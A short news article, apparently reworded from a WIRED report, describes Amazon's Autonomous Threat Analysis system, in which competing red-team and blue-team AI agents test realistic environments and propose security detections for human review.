Tuesday, March 10, 2026

Amazon uses specialized AI agents for deep bug hunting

Share

As generative artificial intelligence accelerates software development, but also increases the ability of cybercriminals to carry out financially motivated or state-backed intrusions. This means security teams at tech companies have more code to review than ever before, while also dealing with even more pressure from bad actors. On Monday, Amazon will release for the first time details about an internal system known as Autonomous Threat Analysis (ATA), which the company uses to aid its security teams proactively identify vulnerabilities on its platforms, perform variant analysis to quickly find other, similar vulnerabilities, and then develop remediation solutions and detection capabilities to patch vulnerabilities before attackers find them.

ATA was born out of an internal Amazon hackathon in August 2024, and security team members say it has since become a key tool. The key concept behind ATA is that it is not a single AI agent designed to perform end-to-end security testing and threat analysis. Instead, Amazon has developed multiple specialized AI agents that compete against each other in two teams to quickly research real-world attack techniques and the different ways they can be used against Amazon systems, and then propose security checks for human review.

“The initial concept was intended to address a critical limitation in security testing – limited scope and the challenge of maintaining current detection capabilities in a rapidly changing threat landscape,” Steve Schmidt, Amazon’s chief security officer, tells WIRED. “Limited coverage means you can’t look at all the software or you can’t access all the applications because there just aren’t enough people. In this case, it’s great to analyze the software stack, but if the detection systems themselves aren’t kept up to date with changes in the threat landscape, you’re missing half the picture.”

To scale the exploit of ATA, Amazon has developed special “high-fidelity” test environments that are deeply realistic representations of Amazon’s production systems, so that ATA can both ingest and generate real telemetry for analysis.

The company’s security teams also ensured that ATA was designed so that each technique used and the detection capabilities it generated were validated against real-world, automated tests and system data. Red team agents working to find attacks that can be used against Amazon systems execute actual commands in special ATA test environments that generate verifiable logs. The blue team, or defense-focused agents, exploit real telemetry to confirm whether their proposed security measures are effective. Whenever an agent develops a novel technique, it also downloads timestamped logs to prove that its claims are correct.

Schmidt says this verifiability reduces false positives and acts as a “hallucination check.” Because the system is built to require certain standards of observable evidence, Schmidt argues that “hallucinations are architecturally impossible.”

Latest Posts

More News